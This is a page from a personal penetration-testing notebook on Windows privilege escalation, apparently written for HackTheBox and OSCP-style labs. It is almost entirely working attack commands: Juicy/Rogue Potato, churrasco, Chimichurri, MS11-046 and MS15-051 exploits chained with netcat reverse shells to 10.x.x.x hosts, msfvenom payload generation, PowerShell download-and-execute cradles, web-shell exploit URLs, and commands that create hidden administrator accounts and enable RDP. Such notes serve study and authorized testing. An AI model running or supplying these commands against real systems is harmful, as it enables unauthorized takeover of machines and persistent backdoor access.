Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • Basics
  • Required for Potato:
  • Token Impersonations
  • Rogue Potato
  • Juicy Potato **BEST**
  • Juicy Potato + Powershell
  • Rotten Potato
  • churrasco
  • chimichurri
  • MS11-046 (AFD PrivEsc)
  • MS15-051
  • Send and Execute

Was this helpful?

  1. 07 Windows PrivEsc

4 Kernel Exploits

Windows PrivEsc Methods

Family
Versions

Rogue Potato

Latest Version

SHOULD work on Windows 10

Juicy Potato

Upgrade of Rotten

Server 2008 R2 - No Hotfixes Windows 7 Enterprise 6.1.7600

Patched in Latest Win-10

Rotten Potato

Old

Year: 2016

Churrasco

Non-Potato

Chimichurri

Non-Potato : MS10-059

Basics

  • https://github.com/SecWiki/windows-kernel-exploits

  • GitlabPotatoesWindowsPrivEsc

Required for Potato:

> whoami
Local Service

> whoami /priv
SeImpersonatePrivilege ..Enabled

Token Impersonations

Service Accounts Cant login with them, but can escalate them

Rogue Potato

  • https://github.com/antonioCoco/RoguePotato

  • https://github.com/antonioCoco/RoguePotato/releases (compiled)

  • https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/

> RoguePotato.exe -r 10.x.x.x -l 9999 -e "C:\PrivEsc\reverse.exe"
> nc -nvlp 9999

Juicy Potato **BEST**

  • Token Impersonation

  • https://github.com/ohpe/juicy-potato

  • http://ohpe.it/juicy-potato/CLSID (or powershell script)

  • https://github.com/ivanitlearning/Juicy-Potato-x86/releases

whoami /priv   ..SeImpersonatePrivilege = JuicyPotato
JuicyPotato.exe -l 5555 -p C:\PrivEsc\reverse.exe -t * -c GUID_CLSID
Juicy.Potato.x86.exe -l 5555 -p "C:\inetpub\wwwroot\shell.exe" -t * -c {F087771F-D74F-4C1A-BB8A-E16ACA9124EA}
JuicyPotato.exe -l 5555 -p c:\Windows\system32\cmd.exe -a "/c C:\intepub\drupal-7.54\nc.exe -e cmd.exe 10.x.x.x 4555" -t *
JuicyPotato.exe -l 5555 -p c:\Windows\system32\cmd.exe -a "/c C:\intepub\drupal-7.54\nc.exe -e cmd.exe 10.x.x.x 4555" -t * -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

nc -nvlp 5555
whoami ..system

Juicy Potato + Powershell

  • Reverse Shell with Admin

  • JP will use Elevated Powershell to grab/exe reverse-ps1-shell

  • https://ohpe.it/juicy-potato/

  • REF: ArcticHTB

> cp /opt/JuicyPotato.exe jp.exe
> cp /opt/nishang/Shells/Invoke-PowerShellTcp.ps1 revshell.ps1
> vim revshell.ps1
Add this to the end of the file:
Invoke-PowerShellTcp -Reverse -IPAddress $IP -Port 7600

> sudo impacket-smbserver kali .

> copy \\10.10.14.34\kali\jp.exe .
> jp.exe -t * -p C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -l 9001 -a "-c IEX(new-object net.webclient).downloadstring('http://$IP:9090/revshell.ps1')" -c {9B1F122C-2982-4e91-AA8B-E071D54F2A4D}

> nc -lvnp 7600
> whoami ..system!!

Rotten Potato

Exploit from 2016 Service Accounts could get System tickets and Impersonate

churrasco

  • REF: GrannyHTB GrandpaHTB

  • https://technet.microsoft.com/library/security/ms09-012

  • Token impersonation via churrasco

  • To escalate privs to System - developed by Cesar Cerrudo.

  • Server 2003 allows Network Service and Local Service to impersonate 'System'

  • Patched by Microsoft in Windows 2012 (MS09-12).

  • On newer systems Juicy Potato works fine.

  • But on older systems, token impersonation is abused via the churrasco exploit.

  • If you have access to a box as nt authority\network service

  • IE: You managed to upload ASP.NET shell

  • You can easily elevate your privileges on the box.

  • You can download the exploit here and compile by yourself

  • or you can use the one from sqlninja which is located at /usr/share/sqlninja/apps/churrasco.exe

  • It’s used by sqlninja in cases when we bruteforced sa password.

  • After uploading you can easily

    • Elevate your privileges.

    • Create an Admin account

    ------------------------
Share from Kali/smb:

locate churrasco.exe
wget https://github.com/Re4son/Churrasco/raw/master/churrasco.exe
cp /usr/share/sqlninja/apps/churrasco.exe /tmp
cp /usr/share/sqlninja/apps/nc.exe /tmp
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.98 RPORT=5555 -f exe > /tmp/venomshell.exe

locate smbserver.py
cd /usr/share/doc/python3-impacket/examples/
sudo python3 smbserver.py share /tmp
nc -nvlp 5555


------------------------
Windows:

whoami /priv    ..SeImpersonatePrivilege - Yes!
systeminfo      ..Server 2003 - Yes!

cd C:\Windows\Temp
copy \\10.x.x.x\share\nc.exe .
copy \\10.x.x.x\share\venomshell.exe .
copy \\10.x.x.x\share\churrasco.exe .

> \\10.x.x.x\share\churrasco.exe -d whoami
> churrasco -d "net user /add <username> <password>"
> churrasco -d "net localgroup administrators <username> /add"
> churrasco -d "net localgroup "Remote Desktop Users" <username> /add"
> churrasco.bin "net user oscp oscp /add && net localgroup Administrators oscp /add"
> churrasco -d "'reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server' /v fDenyTSConnections /t REG_DWORD /d 0 /f"
linux> rdesktop -u oscp -p oscp 10.x.x.x

> churrasco.exe -d venomshell.exe
> churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"
> \\10.x.x.x\share\churrasco.exe -d "C:\Windows\Temp\nc.exe 10.x.x.x 5555 -e cmd.exe"

chimichurri

  • MS10-059

  • Found with WindowsExploitSuggester

  • Server 2008 R2 Datacenter 6.1.7600 N/A Build 7600 No Patch 64bit

  • github/Re4son ..other blog:

cd /opt
git clone https://github.com/egre55/windows-kernel-exploits
cd windows-kernel-exploits/MS10–059: Chimichurri/Compiled
cp Chimichurri.exe .
pythom -m SimpleHTTPServer 4444

cd C:\ColdFusion8\  or:
cd C:\Windows\Temp
echo $webclient = New-Object System.Net.WebClient >wget.ps1
echo $url = "http://$MyIP:4444/Chimichurri.exe" >>wget.ps1
echo $file = "Chimichurri.exe" >>wget.ps1
echo $webclient.DownloadFile($url,$file) >>wget.ps1

powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInterative -NoProfile -File wget.ps1
Chimichurri.exe 10.10.14.xx 5555
nc -nvlp 5555
connected ..system!!

----------
or:

cd /usr/share/doc/python3-impacket/examples
sudo python3 ./smbserver.py share /tmp
nc -nvlp 5555

cd C:\Windows\Temp\
copy \\$MyIP\share\Chimichurri.exe .
Chimichurri.exe $MyIP 5555
system!!

----------
chimichurri.exe $MyIP 5555
nc -nvlp 5555
system!

MS11-046 (AFD PrivEsc)

  • The Ancillary Function Driver (AFD) in afd.sys does not properly validate user-mode input which allows local users to elevate privileges.

  • ms11-046.exe 6.1.7600 Build 7600 - for 32bit only

  • https://www.exploit-db.com/exploits/40564/

https://github.com/abatchy17/WindowsExploits
https://github.com/abatchy17/WindowsExploits/blob/5e9c25cda54fe33fb6e1fd3ae60512a1113b41df/MS11-046/MS11-046.exe

smbserver.py share
\\10.10.14.34\share\MS11-046.exe
whoami ..system!

https://github.com/rasta-mouse/Watson

or
Download from:
https://www.exploit-db.com/exploits/40564

Compile:
apt install mingw-w64  ..if not installed
i686-w64-mingw32-gcc 40564.c -o 40564.exe -lws2_32

python -m SimpleHTTPServer 8080
wget and curl are not installed on the machine however powershell is.
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8080/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
whoami ..system!

MS15-051

  • REF: DrupalPhpVuln

MS15-051 privesc
github/hfiref0x ..compiled Taihou64.exe (firefox thought virus)
github/SecWiki ..MS15-051 ..compiled ..zipped ..download

cp ms15-051x64.exe .
http://10.x.x.x/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe whoami
system!

http://10.x.x.x/ippsec.php?fupload=ms15-051x64.exe&fexec=ms15-051x64.exe "nc64.exe -e 10.x.x.x 5555"
nc -nvlp 5555
system!

Bonus PrivEsc:
ms15–051x64.exe whoami   ..easy

Send and Execute

  • Execute files from UNC shares

  • Ex: DrupalPhpVuln

impacket-smbserver share `myfolder`
http://10.x.x.x/ippsec.php?fexe=\\10.x.x.x\share\privesc.exe whoami
Previous3 PrivEscNext5 Looting

Last updated 2 years ago

Was this helpful?